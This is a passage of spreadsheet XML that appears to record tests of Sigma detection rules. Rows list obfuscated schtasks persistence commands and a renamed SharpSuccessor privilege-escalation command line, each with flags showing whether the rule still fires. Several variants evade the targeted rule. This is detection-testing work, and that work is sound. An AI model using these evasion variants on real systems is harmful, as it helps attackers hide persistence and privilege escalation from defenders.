      <c r="B137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C137" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D137" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E137" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tN EvilTask -"TR" "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I137" s="44" t="n"/>
      <c r="J137" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="n"/>
      <c r="B138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C138" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D138" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E138" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTE /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J138" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="43" t="n"/>
      <c r="B139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C139" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D139" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E139" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I139" s="43" t="n"/>
      <c r="J139" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K139" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="43" t="n"/>
      <c r="B140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C140" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D140" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E140" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J140" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K140" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="43" t="n"/>
      <c r="B141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C141" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D141" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E141" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN "WinUpdateTask" /TR "powershell -NoPrOfilE -NoNintEracTIVe /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I141" s="43" t="n"/>
      <c r="J141" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="43" t="n"/>
      <c r="B142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C142" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D142" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E142" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tn "WinUpdateTask" /tr "powershell -nop -nONInTERaCTIvE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I142" s="44" t="n"/>
      <c r="J142" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="43" t="n"/>
      <c r="B143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C143" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D143" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E143" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" "WinUpdateTask" -"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I143" s="44" t="n"/>
      <c r="J143" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="43" t="n"/>
      <c r="B144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C144" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D144" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E144" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"TN" "WinUpdateTask" /TR "powershell /"NoProfile" -"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I144" s="44" t="n"/>
      <c r="J144" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="43" t="n"/>
      <c r="B145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C145" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D145" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E145" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /tn "WinUpdateTask" /tr "powershell /"NoProfile" -NONInTERactIVE -wiNdOwStYLe Hidden -c \" Write-Host 'Test' \"" /Sc ONLOGON</t>
        </is>
      </c>
      <c r="F145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J145" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="43" t="n"/>
      <c r="B146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C146" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D146" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E146" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -CommAND \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J146" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="43" t="n"/>
      <c r="B147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C147" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D147" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E147" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell -"NoProfile" /"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J147" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="43" t="n"/>
      <c r="B148" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C148" s="43" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D148" s="43" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E148" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATe -"TN" "WinUpdateTask" /TR "powershell -nop -noNInteractIVE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H148" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J148" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K148" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="44" t="n"/>
      <c r="B149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C149" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D149" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E149" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAtE /TN "WinUpdateTask" -"TR" "powershell -nOPrOfile -NonInteractive -WInDOWStYlE Hidden -COMMANd \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H149" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I149" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J149" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K149" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="43" t="n"/>
      <c r="B150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C150" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D150" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E150" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "WinUpdateTask" /"TR" "powershell -NoPROfIlE /"NonInteractive" /"WindowStyle" Hidden -"Command" \" Write-Host 'Test' \"" -"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I150" s="43" t="n"/>
      <c r="J150" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K150" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C151" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D151" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E151" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /add /IMp:ADmiNiSTRaTOR /p:C:\WIndoWS\SySTEm32 /aCC:tESTUSer /n:dnSADmIn</t>
        </is>
      </c>
      <c r="F151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J151" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C152" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D152" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E152" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /"add" /imp:Administrator /p:C:\Windows\System32 /acc:TestUser /N:dnsaDmiN</t>
        </is>
      </c>
      <c r="F152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J152" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C153" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D153" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E153" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /add /"imp:Administrator" /P:c:\WinDoWs\sYsTeM32 /acc:TestUser /n:DnSadmIN</t>
        </is>
      </c>
      <c r="F153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J153" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C154" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D154" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E154" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe -"add" /imp:Administrator /p:C:\Windows\System32 /acc:TestUser /"n:DnsAdmin"</t>
        </is>
      </c>
      <c r="F154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J154" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C155" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D155" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E155" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /ADd /imp:Administrator /p:C:\wiNDOwS\sySteM32 /"acc:TestUser" /N:DnsAdmin</t>
        </is>
      </c>
      <c r="F155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J155" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K155" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C156" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D156" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E156" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /add /"imp:Administrator" /P:C:\windOws\syStEM32 /"acc:TestUser" -"n:DnsAdmin"</t>
        </is>
      </c>
      <c r="F156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J156" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K156" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C157" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D157" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E157" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /add /"imp:Administrator" -"p:C:\Windows\System32" /acc:TestUser /n:DnsAdmin</t>
        </is>
      </c>
      <c r="F157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J157" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K157" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C158" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D158" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E158" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /add /imp:Administrator /p:c:\wIndOwS\sYsTeM32 /acc:TestUser /"n:DnsAdmin"</t>
        </is>
      </c>
      <c r="F158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J158" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C159" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D159" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E159" s="44" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /add /imp:Administrator /p:C:\Windows\System32 -"acc:TestUser" /n:dNsADMiN</t>
        </is>
      </c>
      <c r="F159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J159" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="44" t="b">
        <v>0</v>
      </c>
